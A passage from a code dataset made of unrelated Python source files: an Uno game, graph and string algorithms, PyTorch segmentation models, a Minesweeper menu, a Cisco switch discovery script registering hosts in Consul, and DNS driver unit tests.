Deck, PlayerDeck\nfrom .card import ColorCard, SpecialCard, WildCard\n\nfrom .errors import (NotEnoughPlayers, GameNotStarted, GameInProgress, BadCard, WrongPlayer,\n DrawAndSkipPlayer, SkipPlayer, Reversed)\n\nclass UnoGame:\n \"\"\"[summary]\n \n Raises:\n NotEnoughPlayers: [description]\n GameNotStarted: [description]\n WrongPlayer: [description]\n BadCard: [description]\n TypeError: [description]\n GameInProgress: [description]\n \"\"\" \n def __init__(self, players = [], deck_size = 2):\n \"\"\"[summary]\n \n Keyword Arguments:\n players {list} -- [description] (default: {[]})\n deck_size {int} -- [description] (default: {2})\n \"\"\" \n self.started = False\n self.players = players\n self.deck = Deck(deck_size)\n\n # TODO: make first card not a special\n # TODO: handle multiple skips/plus_2s???\n def start_game(self):\n \"\"\"[summary]\n \n Raises:\n NotEnoughPlayers: [description]\n \"\"\" \n if len(self.players) < 2:\n raise NotEnoughPlayers\n\n for player in self.players:\n player.deck = PlayerDeck(self.deck.distribute(7))\n\n self._players_iter = iter(self.players)\n self._current_player = next(self._players_iter)\n\n self.history = [self.deck.pop()]\n\n self.started = True\n\n @property\n def last_card(self):\n \"\"\"\n Returns:\n Card -- last played card\n \"\"\" \n return self.history[-1]\n\n def play(self, player, card):\n \"\"\"[summary]\n \n Arguments:\n player {Object} -- any object with a object.deck\n card {Card} -- card to be played\n \n Raises:\n GameNotStarted: [description]\n WrongPlayer: [description]\n BadCard: [description]\n TypeError: [description]\n \"\"\" \n if not self.started: raise GameNotStarted\n if not player == self._current_player: raise WrongPlayer\n \n last_card = self.last_card\n if isinstance(card, (ColorCard, SpecialCard)):\n last_card.compare(card)\n elif isinstance(card, WildCard):\n pass\n else: raise TypeError(\"expected type ColorCard || SpecialCard || WildCard not %s.\" % type(card))\n\n player.deck.remove(card)\n self.history.append(card)\n\n try:\n if isinstance(card, (SpecialCard, WildCard)):\n if card.special.startswith(\"+\"):\n draw_amount = int(card.special.split(\"\", 1)[1])\n cards = self.deck.distribute(draw_amount)\n\n player = self._next_player()\n player.deck.extend(cards)\n\n raise DrawAndSkipPlayer(player, draw_amount)\n elif card.special == \"reverse\":\n self.players.reverse()\n raise Reversed\n elif card.special == \"skip\":\n raise SkipPlayer(self._next_player())\n finally:\n self._next_player()\n\n def draw_card(self, player):\n if not self.started: raise GameNotStarted\n if not player == self._current_player: raise WrongPlayer\n\n player.deck.extend(self.deck.distribute(1))\n\n def add_player(self, player):\n \"\"\"\n Arguments:\n player {Object} -- any object, object.deck will be used to store PlayerDeck\n \n Raises:\n GameInProgress: [description]\n \"\"\" \n if self.started: raise GameInProgress\n self.players.append(player)\n\n def _next_player(self):\n try:\n self._current_player = next(self._players_iter)\n except StopIteration:\n self._players_iter = iter(self.players)\n self._current_player = next(self._players_iter)\n finally:\n return self._current_player","sub_path":"uno/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563819425","text":"\n# def earliest_ancestor(ancestors, starting_node):\n# pass\n\ntest_ancestors = [(1, 3), (2, 3), (3, 6), (5, 6), (5, 7), (4, 5), (4, 8), (8, 9), (11, 8), (10, 1)] \t\n \ndef createGraph(ancestors):\n '''Create graph from pairs - reverse relations for DFT'''\n vertices = {}\n for i in ancestors:\n if i[1] not in vertices:\n vertices[i[1]] = set()\n if i[0] not in vertices:\n vertices[i[0]] = set()\n vertices[i[1]].add(i[0])\n return vertices\n\ndef earliest_ancestor(test_ancestors, starting_vertex, visited=None):\n ancestors = createGraph(test_ancestors)\n visited = [False]*(len(ancestors)+1)\n stack = []\n stack.append(starting_vertex)\n path = []\n s = starting_vertex\n\n while stack:\n starting_vertex = stack[-1]\n stack.pop()\n if (not visited[starting_vertex]):\n path.append(starting_vertex)\n visited[starting_vertex] = True\n for node in ancestors[starting_vertex]:\n if (not visited[node]):\n stack.append(node)\n\n if s == path[-1]:\n return -1\n else:\n if path[-1] not in ancestors[path[-2]] and path[-2] < path[-1]:\n return path[-2]\n else:\n return path[-1]\n\n\n\nprint(earliest_ancestor(test_ancestors, 8))\n\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"578660631","text":"from MinesweeperLogic import MineSweeper\nfrom os.path import isfile\nfrom os import remove\nimport json\nimport sys\n\nnew_game = MineSweeper()\n\ndef menu():\n print(\"****************************************\")\n print(\"* MineSweeper \\U0001F431 *\")\n print(\"****************************************\")\n print(\" 1 - Play *\")\n print(\" 2 - Continue *\")\n print(\" 3 - Sair *\")\n print(\"****************************************\\n\")\n option = int(input(\"Choose :\"))\n if option == 1:\n play()\n elif option == 2:\n restoreGame()\n else:\n exitGame\n\ndef play():\n new_game.new_game(5, 5)\n startGame()\n\ndef startGame():\n count = 0 \n while new_game.death() != \"Died\":\n if new_game.moves_remainings > 0:\n if count != 0:\n print(\"Good Boy\")\n new_game.print_board()\n row = int(input(\"Insert a row :\"))\n col = int(input(\"Isert a column :\"))\n new_game.move(row, col) \n count += count \n tryAgain()\n\ndef restoreGame():\n if isfile(\"game.json\"):\n file = open(\"game.json\")\n game = json.loads(file.read())\n new_game.restorar(game)\n file.close()\n startGame()\n else:\n print(\"There arent games saved!\\n\")\n\ndef tryAgain():\n print(\" 1 - New game \")\n print(\" 2 - Quit \")\n option = int(input(\"Choose : \"))\n if option == 1:\n menu()\n else:\n exitGame()\n\ndef exitGame():\n sys.exit(0)\n\nmenu()","sub_path":"ynoa/monolith/ViewMinesweeper.py","file_name":"ViewMinesweeper.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490854036","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.model_zoo import load_url as load_state_dict_from_url\nfrom collections import OrderedDict\nimport torch.nn.functional as F\nfrom torch.jit.annotations import Dict\nfrom srcs.Deeplabv3 import DeepLabHead, DeepLabV3\nimport srcs.resnet as resnet\n\n\n\nmodel_urls = {\n 'fcn_resnet50_coco': None,\n 'fcn_resnet101_coco': 'https://download.pytorch.org/models/fcn_resnet101_coco-7ecb50ca.pth',\n 'deeplabv3_resnet50_coco': None,\n 'deeplabv3_resnet101_coco': 'https://download.pytorch.org/models/deeplabv3_resnet101_coco-586e9e4e.pth',\n}\n\nclass _SimpleSegmentationModel(nn.Module):\n __constants__ = ['aux_classifier']\n\n def __init__(self, backbone, classifier, aux_classifier=None):\n super(_SimpleSegmentationModel, self).__init__()\n self.backbone = backbone\n self.classifier = classifier\n self.aux_classifier = aux_classifier\n\n def forward(self, x):\n input_shape = x.shape[-2:]\n # contract: features is a dict of tensors\n features = self.backbone(x)\n\n result = OrderedDict()\n x = features[\"out\"]\n x = self.classifier(x)\n x = F.interpolate(x, size=input_shape, mode='bilinear', align_corners=False)\n result[\"out\"] = x\n\n if self.aux_classifier is not None:\n x = features[\"aux\"]\n x = self.aux_classifier(x)\n x = F.interpolate(x, size=input_shape, mode='bilinear', align_corners=False)\n result[\"aux\"] = x\n\n return result\n\nclass FCN(_SimpleSegmentationModel):\n \"\"\"\n Implements a Fully-Convolutional Network for semantic segmentation.\n\n Arguments:\n backbone (nn.Module): the network used to compute the features for the model.\n The backbone should return an OrderedDict[Tensor], with the key being\n \"out\" for the last feature map used, and \"aux\" if an auxiliary classifier\n is used.\n classifier (nn.Module): module that takes the \"out\" element returned from\n the backbone and returns a dense prediction.\n aux_classifier (nn.Module, optional): auxiliary classifier used during training\n \"\"\"\n pass\n\n\nclass FCNHead(nn.Sequential):\n def __init__(self, in_channels, channels):\n inter_channels = in_channels // 4\n layers = [\n nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(inter_channels),\n nn.ReLU(),\n nn.Dropout(0.1),\n nn.Conv2d(inter_channels, channels, 1)\n ]\n\n super(FCNHead, self).__init__(*layers)\n\n\n\nclass IntermediateLayerGetter(nn.ModuleDict):\n \"\"\"\n Module wrapper that returns intermediate layers from a model\n It has a strong assumption that the modules have been registered\n into the model in the same order as they are used.\n This means that one should **not** reuse the same nn.Module\n twice in the forward if you want this to work.\n Additionally, it is only able to query submodules that are directly\n assigned to the model. So if `model` is passed, `model.feature1` can\n be returned, but not `model.feature1.layer2`.\n Arguments:\n model (nn.Module): model on which we will extract the features\n return_layers (Dict[name, new_name]): a dict containing the names\n of the modules for which the activations will be returned as\n the key of the dict, and the value of the dict is the name\n of the returned activation (which the user can specify).\n Examples::\n >>> m = torchvision.models.resnet18(pretrained=True)\n >>> # extract layer1 and layer3, giving as names `feat1` and feat2`\n >>> new_m = torchvision.models._utils.IntermediateLayerGetter(m,\n >>> {'layer1': 'feat1', 'layer3': 'feat2'})\n >>> out = new_m(torch.rand(1, 3, 224, 224))\n >>> print([(k, v.shape) for k, v in out.items()])\n >>> [('feat1', torch.Size([1, 64, 56, 56])),\n >>> ('feat2', torch.Size([1, 256, 14, 14]))]\n \"\"\"\n _version = 2\n __annotations__ = {\n \"return_layers\": Dict[str, str],\n }\n\n def __init__(self, model, return_layers):\n if not set(return_layers).issubset([name for name, _ in model.named_children()]):\n raise ValueError(\"return_layers are not present in model\")\n orig_return_layers = return_layers\n return_layers = {str(k): str(v) for k, v in return_layers.items()}\n layers = OrderedDict()\n for name, module in model.named_children():\n layers[name] = module\n if name in return_layers:\n del return_layers[name]\n if not return_layers:\n break\n\n super(IntermediateLayerGetter, self).__init__(layers)\n self.return_layers = orig_return_layers\n\n def forward(self, x):\n out = OrderedDict()\n for name, module in self.items():\n x = module(x)\n if name in self.return_layers:\n out_name = self.return_layers[name]\n out[out_name] = x\n return out\n\ndef _segm_resnet(name, backbone_name, num_classes, aux, pretrained_backbone=True):\n backbone = resnet.__dict__[backbone_name](\n pretrained=pretrained_backbone,\n replace_stride_with_dilation=[False, True, True])\n\n return_layers = {'layer4': 'out'}\n if aux:\n return_layers['layer3'] = 'aux'\n backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)\n\n aux_classifier = None\n if aux:\n inplanes = 1024\n aux_classifier = FCNHead(inplanes, num_classes)\n\n model_map = {\n 'deeplabv3': (DeepLabHead, DeepLabV3),\n 'fcn': (FCNHead, FCN),\n }\n inplanes = 2048\n classifier = model_map[name][0](inplanes, num_classes)\n base_model = model_map[name][1]\n\n model = base_model(backbone, classifier, aux_classifier)\n return model\n\ndef _load_model(arch_type, backbone, pretrained, progress, num_classes, aux_loss, **kwargs):\n if pretrained:\n aux_loss = True\n model = _segm_resnet(arch_type, backbone, num_classes, aux_loss, **kwargs)\n if pretrained:\n arch = arch_type + '_' + backbone + '_coco'\n model_url = model_urls[arch]\n if model_url is None:\n raise NotImplementedError('pretrained {} is not supported as of now'.format(arch))\n else:\n state_dict = load_state_dict_from_url(model_url, progress=progress)\n model.load_state_dict(state_dict)\n return model\n\ndef deeplabv3_resnet101(pretrained=False, progress=True,\n num_classes=21, aux_loss=None, **kwargs):\n \"\"\"Constructs a DeepLabV3 model with a ResNet-101 backbone.\n Args:\n pretrained (bool): If True, returns a model pre-trained on COCO train2017 which\n contains the same classes as Pascal VOC\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _load_model('deeplabv3', 'resnet101', pretrained, progress, num_classes, aux_loss, **kwargs)\n\n\ndef fcn_resnet101(pretrained=False, progress=True,\n num_classes=21, aux_loss=None, **kwargs):\n \"\"\"Constructs a DeepLabV3 model with a ResNet-101 backbone.\n Args:\n pretrained (bool): If True, returns a model pre-trained on COCO train2017 which\n contains the same classes as Pascal VOC\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _load_model('fcn', 'resnet101', pretrained, progress, num_classes, aux_loss, **kwargs)\n\n\nif __name__==\"__main__\":\n\n import torch\n model = deeplabv3_resnet101(pretrained=True)\n x = torch.randn(2, 3, 512, 512)\n print(model(x)['out'].size())\n exit()","sub_path":"DeepLabv3_CRF_demo/srcs/segment_model.py","file_name":"segment_model.py","file_ext":"py","file_size_in_byte":7734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288241376","text":"# python3\r\nimport sys\r\n\r\n\r\nclass SuffixArray:\r\n alpha = {'A', 'C', 'T', 'G', '$'}\r\n\r\n def __init__(self, text):\r\n self.text = text\r\n self.length = len(self.text)\r\n self.suffix_array = self.build_suffix_array()\r\n\r\n def sort_characters(self):\r\n order = [None] * self.length\r\n sorting_order = {a: i for i, a in enumerate(sorted(self.alpha))}\r\n count = [0] * len(self.alpha)\r\n for s in self.text:\r\n count[sorting_order[s]] += 1\r\n for j in range(1, len(self.alpha)):\r\n count[j] += count[j - 1]\r\n for i in range(self.length)[::-1]:\r\n s = self.text[i]\r\n count[sorting_order[s]] -= 1\r\n order[count[sorting_order[s]]] = i\r\n return order\r\n\r\n def compute_class(self, order):\r\n classes = [0] * self.length\r\n for i in range(1, self.length):\r\n if self.text[order[i]] != self.text[order[i - 1]]:\r\n classes[order[i]] = classes[order[i - 1]] + 1\r\n else:\r\n classes[order[i]] = classes[order[i - 1]]\r\n return classes\r\n\r\n def sort_doubles(self, length, order, classes):\r\n count = [0] * self.length\r\n new_order = [None] * self.length\r\n for i in range(self.length):\r\n count[classes[i]] += 1\r\n\r\n for j in range(1, self.length):\r\n count[j] += count[j - 1]\r\n for i in range(self.length)[::-1]:\r\n start = (order[i] - length + self.length) % self.length\r\n cl = classes[start]\r\n count[cl] -= 1\r\n new_order[count[cl]] = start\r\n\r\n return new_order\r\n\r\n def update_class(self, length, order, classes):\r\n new_classes = [0] * self.length\r\n for i in range(1, self.length):\r\n current = order[i]\r\n previous = order[i - 1]\r\n middle = (current + length) % self.length\r\n middle_previous = (previous + length) % self.length\r\n if (classes[current] != classes[previous]\r\n or classes[middle] != classes[middle_previous]):\r\n new_classes[current] = new_classes[previous] + 1\r\n else:\r\n new_classes[current] = new_classes[previous]\r\n\r\n return new_classes\r\n\r\n def build_suffix_array(self):\r\n \"\"\"\r\n Build suffix array of the string text and\r\n return a list result of the same length as the text\r\n such that the value result[i] is the index (0-based)\r\n in text where the i-th lexicographically smallest\r\n suffix of text starts.\r\n \"\"\"\r\n order = self.sort_characters()\r\n classes = self.compute_class(order)\r\n length = 1\r\n while length < len(self.text):\r\n order = self.sort_doubles(length, order, classes)\r\n classes = self.update_class(length, order, classes)\r\n length *= 2\r\n return order\r\n\r\n def get_suffix(self, position):\r\n return self.text[self.suffix_array[position]:]\r\n\r\n\r\ndef compare_texts(a, b):\r\n min_len = min(len(a), len(b))\r\n return a[:min_len] > b[:min_len]\r\n\r\n\r\ndef find_pattern(sf, pattern):\r\n minindex = 0\r\n maxindex = len(sf.text)\r\n while minindex < maxindex:\r\n midindex = (minindex + maxindex)//2\r\n if compare_texts(pattern, sf.get_suffix(midindex)):\r\n minindex = midindex + 1\r\n else:\r\n maxindex = midindex\r\n start = minindex\r\n maxindex = len(sf.text)\r\n\r\n while minindex < maxindex:\r\n midindex = (minindex + maxindex)//2\r\n if compare_texts(sf.get_suffix(midindex), pattern):\r\n maxindex = midindex\r\n else:\r\n minindex = midindex + 1\r\n end = maxindex - 1\r\n if end < start:\r\n return None, None\r\n else:\r\n return start, end\r\n\r\n\r\ndef find_occurrences(text, patterns):\r\n sf = SuffixArray(text+'$')\r\n occs = set()\r\n for pattern in patterns:\r\n start, end = find_pattern(sf, pattern)\r\n if start is not None:\r\n occs.update(set(sf.suffix_array[start: end+1]))\r\n\r\n return occs\r\n\r\n\r\nif __name__ == '__main__':\r\n text = sys.stdin.readline().strip()\r\n pattern_count = int(sys.stdin.readline().strip())\r\n patterns = sys.stdin.readline().strip().split()\r\n occs = find_occurrences(text, patterns)\r\n print(\" \".join(map(str, occs)))\r\n","sub_path":"c4/week4/suffix_array_matching/suffix_array_matching.py","file_name":"suffix_array_matching.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"505134099","text":"class Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n END_FLAG, VISITED_FLAG = '$', '#'\n DIRECTIONS = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n matchedWords = []\n rows = len(board)\n cols = len(board[0]) if rows > 0 else 0\n if rows == 0 or cols == 0:\n return matchedWords\n trie = {}\n for word in words:\n currentNode = trie\n for char in word:\n currentNode = currentNode.setdefault(char, {})\n currentNode[END_FLAG] = word\n \n def backtrack(row, col, parentNode):\n char = board[row][col]\n currentNode = parentNode[char]\n wordMatch = currentNode.pop(END_FLAG, False)\n if wordMatch:\n matchedWords.append(wordMatch)\n board[row][col] = VISITED_FLAG\n for direction in DIRECTIONS:\n newRow, newCol = row + direction[0], col + direction[1]\n if newRow >= 0 and newRow < rows and newCol >= 0 and newCol < cols and board[newRow][newCol] in currentNode:\n backtrack(newRow, newCol, currentNode)\n board[row][col] = char\n if not currentNode:\n parentNode.pop(char)\n \n for row in range(rows):\n for col in range(cols):\n if board[row][col] in trie:\n backtrack(row, col, trie)\n return matchedWords","sub_path":"LeetCode/Trie/Word Search II.py","file_name":"Word Search II.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379120183","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 23 14:01:08 2021\n\n@author: kun-linho\n\"\"\"\n\n\nimport sys\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.stats import poisson\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport glob, os\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom pathlib import Path\nfrom math import sqrt\nfrom collections import OrderedDict\ninput_file = '/Users/kun-linho/Desktop/SRR7780741_DepthofCoverage_Distribution.txt'\nwith open(input_file,'r')as f:\n file = f.read().split('\\n')[:-1]\n\nfile.remove('1 Total_Depth')\n\n\nlast_pos = int(file[-1].split(\" \")[1])\nif last_pos >= 1000:\n last_pos = last_pos\nelse:\n last_pos = 1000 \n\ntoal_pos_cover=0\ntotal_cover = 0\ntotal_pos = 0\nfull_position_simultation ={}\n\n\nfor i in range(len(file)):\n number_position = int(file[i].split(\" \")[0])\n cover_times = int(file[i].split(\" \")[1])\n full_position_simultation[cover_times]= int(number_position)\n total_cover += cover_times\n total_pos +=number_position\n toal_pos_cover+=number_position*cover_times\n\nratio_order_dict=OrderedDict()\norder_dict = OrderedDict()\n\n## fill up the gap data, if there is no data at that position, then fill up with 0 \nfor i in range(last_pos+1):\n if i not in full_position_simultation.keys():\n ratio_order_dict[i]=0\n order_dict[i]=0\n else:\n ratio_order_dict[i] = full_position_simultation[i]/total_pos\n order_dict[i] = full_position_simultation[i]\n \n \ntotal_data = pd.DataFrame(list(order_dict.items()),columns=['cover_times','number_position'])\nprint((total_data['number_position'].iloc[0:]*total_data['cover_times'].iloc[0:]).sum()/(total_data['number_position'].iloc[0:].sum()))\ncover_times_arr = total_data['cover_times'].values\nnumber_pos_arr = total_data['number_position'].values\nprob_arr= number_pos_arr/total_pos\n\ncover_1000 = cover_times_arr[0:1000]\npos_1000 = number_pos_arr[0:1000]\nratio_1000 = prob_arr[0:1000]\n\nplot_input = {'cover_times':cover_1000,'number_position':pos_1000,'ratio_of_pos':ratio_1000}\n\nplot_data = pd.DataFrame(plot_input)\n","sub_path":"randomness_update.py","file_name":"randomness_update.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"522495583","text":"#pip install PyYAML\nimport yaml\n#pip install python-nmap\nimport nmap\nimport socket\n#pip install pysnmp\nfrom pysnmp.hlapi import *\n#Nmap needs also to bin install \"yum install nmap\"\n\nimport json\n#pip install requests\nimport requests\n\n\nclass cisco:\n\n\tdef __init__(self,config_path):\n\t\twith open(config_path) as f:\n\t\t\tconfig = yaml.safe_load(f)\n\t\tself.networks = config['networks']\n\t\tself.consul = config['consul']\n\t\t\n\tdef discover(self):\n\t\tnm = nmap.PortScanner()\n\t\tresults=[]\n\t\tfor network in self.networks:\n\t\t\tnm.scan(hosts=network, arguments='-R -sU -p 161')\n\t\t\tfor host in nm.all_hosts():\n\t\t\t\tg = getCmd(SnmpEngine(),CommunityData('public'),UdpTransportTarget((host, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))\n\t\t\t\terror_indication, error_status, error_index, var_binds = next(g)\n\t\t\t\t#print (error_indication)\n\t\t\t\tif error_indication is None:\n\t\t\t\t\tname, value = var_binds[0]\n\t\t\t\t\tif \"Cisco\" in value.prettyPrint():\n\t\t\t\t\t\t#print (host+\" : \"+value.prettyPrint())\n\t\t\t\t\t\t#result.append((host,value.prettyPrint()))\n\t\t\t\t\t\tresults.append({\"Node\": socket.gethostbyaddr(host)[0],\"Address\": host,\"service\": { \"Service\": \"switch\", \"tags\": [\"cisco\"], \"port\": 161 }})\n\t\t\n\t\treturn results\n\t\t\n\tdef addToConsul(self,results):\n\t\tstatusCodeList=[]\n\t\tfor result in results:\n\t\t\tprint (result)\n\t\t\t#data = json.dumps(result)\n\t\t\t#print (data)\n\t\t\t#response = requests.put('http://127.0.0.1:8500/v1/catalog/register', data=result)\n\t\t\tresponse = requests.put(self.consul['server']+self.consul['register'], data=result)\n\t\t\tprint (response.status_code)\n\t\t\tstatusCodeList.append(response.status_code)\n\t\treturn statusCodeList\n\t\t\n\tdef delFromConsul(self,items):\n\t\t#data = json.dumps(item)\n\t\tstatusCodeList=[]\n\t\tprint (items)\n\t\tfor item in items:\n\t\t\t#response = requests.put('http://127.0.0.1:8500/v1/catalog/deregister', data=item)\n\t\t\tresponse = requests.put(self.consul['server']+self.consul['deregister'], data=item)\n\t\t\tprint (response.status_code)\n\t\t\tstatusCodeList.append(response.status_code)\n\t\treturn statusCodeList\n\t\t\n\tdef getFromConsul(self):\n\t\t#response = requests.get('http://127.0.0.1:8500/v1/catalog/service/switch')\n\t\tresponse = requests.get(self.consul['server']+self.consul['catalog'])\n\t\t#data = json.dumps(response.json())\n\t\treturn response.json()\n\t\t\n\tdef nmapVsConsul(self):\n\t\tscan = self.discover()\n\t\tconsul = self.getFromConsul()\n\t\tresult=[]\n\t\tjsonRemove=[]\n\t\tjsonAdd=[]\n\t\tfor scanItem in scan:\n\t\t\tscanNotFoundInConsul=0\n\t\t\t\n\t\t\tfor consulItem in consul:\n\t\t\t\tif scanItem[\"Node\"] == consulItem[\"Node\"]:\n\t\t\t\t\t#print (\"found\")\n\t\t\t\t\tscanNotFoundInConsul=0\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tscanNotFoundInConsul=1\n\t\t\t\t\n\t\t\tif scanNotFoundInConsul:\n\t\t\t\tresult.append (scanItem[\"Node\"]+ \" in scan but not in Consul! Add?\")\n\t\t\t\tjsonAdd.append (json.dumps(scanItem))\n\t\tfor consulItem in consul:\n\t\t\tconsulNotFoundInScan=0\n\t\t\tfor scanItem in scan:\n\t\t\t\tif scanItem[\"Node\"] == consulItem[\"Node\"]:\n\t\t\t\t\t#print (\"found\")\n\t\t\t\t\tconsulNotFoundInScan=0\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tconsulNotFoundInScan=1\n\t\t\t\t\n\t\t\tif consulNotFoundInScan:\n\t\t\t\tresult.append(consulItem[\"Node\"]+ \" in Consul but not in last scan! Delete?\")\n\t\t\t\tjsonRemove.append(json.dumps(consulItem))\n\t\t\n\t\treturn (jsonAdd,jsonRemove)","sub_path":"app/cisco.py","file_name":"cisco.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"71217368","text":"# Copyright (c) 2016 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport uuid\n\nimport ddt\nimport mock\n\nfrom poppy.dns.default import driver\nfrom poppy.model.helpers import domain\nfrom poppy.model import service\nfrom tests.unit import base\n\n\n@ddt.ddt\nclass TestServicesCreate(base.TestCase):\n\n def setUp(self):\n super(TestServicesCreate, self).setUp()\n provider = driver.DNSProvider(self.conf)\n self.controller = provider.services_controller\n\n def test_create_with_no_links(self):\n responders = [{\n 'Akamai': {\n 'id': str(uuid.uuid4()),\n 'links': []\n },\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': []\n }\n }]\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n dns_details = self.controller.create(responders)\n\n for responder in responders:\n for provider_name in responder:\n self.assertEqual([], dns_details[provider_name]['access_urls'])\n\n def test_create_with_provider_error(self):\n\n responders = [{\n 'Akamai': {\n 'error': 'Create service failed with Akamai',\n 'error_detail': 'Error details'\n },\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'blog.mocksite.com',\n 'href': u'blog.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'test.mocksite.com',\n 'href': u'test.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n dns_details = self.controller.create(responders)\n\n # returned default dns details should not contain any errors\n for provider_name in dns_details:\n self.assertNotIn('error', dns_details[provider_name])\n self.assertNotIn('error_detail', dns_details[provider_name])\n\n def test_create(self):\n domain_names = [u'blog.mocksite.com', u'test.mocksite.com']\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'blog.mocksite.com',\n 'href': u'blog.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'test.mocksite.com',\n 'href': u'test.mocksite.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n dns_details = self.controller.create(responders)\n\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_name in domain_names:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_name])\n\n\n@ddt.ddt\nclass TestServicesDelete(base.TestCase):\n\n def setUp(self):\n super(TestServicesDelete, self).setUp()\n provider = driver.DNSProvider(self.conf)\n self.controller = provider.services_controller\n\n def test_delete(self):\n akamai_access_urls = [\n {\n u'provider_url': u'mycdn.com.v2.mdc.edgesuite.net',\n u'domain': u'mocksite.com',\n u'operator_url': u'mocksite.com.cdn80.mycdn.com'\n }\n ]\n\n fastly_access_urls = [\n {\n u'provider_url': u'mocksite.com.global.fastly.net',\n u'domain': u'mocksite.com',\n u'operator_url': u'mocksite.cdn80.mycdn.com'\n }\n ]\n\n akamai_details = mock.Mock()\n akamai_details.access_urls = akamai_access_urls\n fastly_details = mock.Mock()\n fastly_details.access_urls = fastly_access_urls\n provider_details = {\n 'Akamai': akamai_details,\n 'Fastly': fastly_details\n }\n\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n\n dns_responder = self.controller.delete(provider_details)\n for provider_name in provider_details:\n self.assertEqual({}, dns_responder[provider_name])\n\n\n@ddt.ddt\nclass TestServicesUpdate(base.TestCase):\n\n def setUp(self):\n super(TestServicesUpdate, self).setUp()\n provider = driver.DNSProvider(self.conf)\n self.controller = provider.services_controller\n\n self.domains_old = [domain.Domain('test.domain.com'),\n domain.Domain('blog.domain.com')]\n self.origins_old = []\n\n fastly_access_urls_old = [\n {\n u'provider_url': u'test.domain.com.global.prod.fastly.net',\n u'domain': u'test.domain.com',\n u'operator_url': u'test.domain.com.cdn80.mycdn.com'\n },\n {\n u'provider_url': u'blog.domain.com.global.prod.fastly.net',\n u'domain': u'blog.domain.com',\n u'operator_url': u'blog.domain.com.cdn80.mycdn.com'\n }]\n\n fastly_provider_details_old = mock.Mock()\n fastly_provider_details_old.access_urls = fastly_access_urls_old\n\n provider_details_old = {\n 'Fastly': fastly_provider_details_old\n }\n\n self.service_old = service.Service(service_id=uuid.uuid4(),\n name='myservice',\n domains=self.domains_old,\n origins=self.origins_old,\n flavor_id='standard')\n self.service_old.provider_details = provider_details_old\n\n def test_update_remove_domains_provider_error(self):\n domains_new = [domain.Domain('test.domain.com'),\n domain.Domain('blog.domain.com'),\n domain.Domain('pictures.domain.com')]\n service_new = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=domains_new,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'error': 'Create service failed'\n }\n }]\n\n dns_details = self.controller.update(self.service_old,\n service_new,\n responders)\n # dns_details should be empty because the only responder available\n # had an error an gets filtered\n self.assertEqual({}, dns_details)\n\n def test_update_remove_domains(self):\n domains_new = [domain.Domain('test.domain.com')]\n service_updates = service.Service(\n service_id=self.service_old.service_id,\n 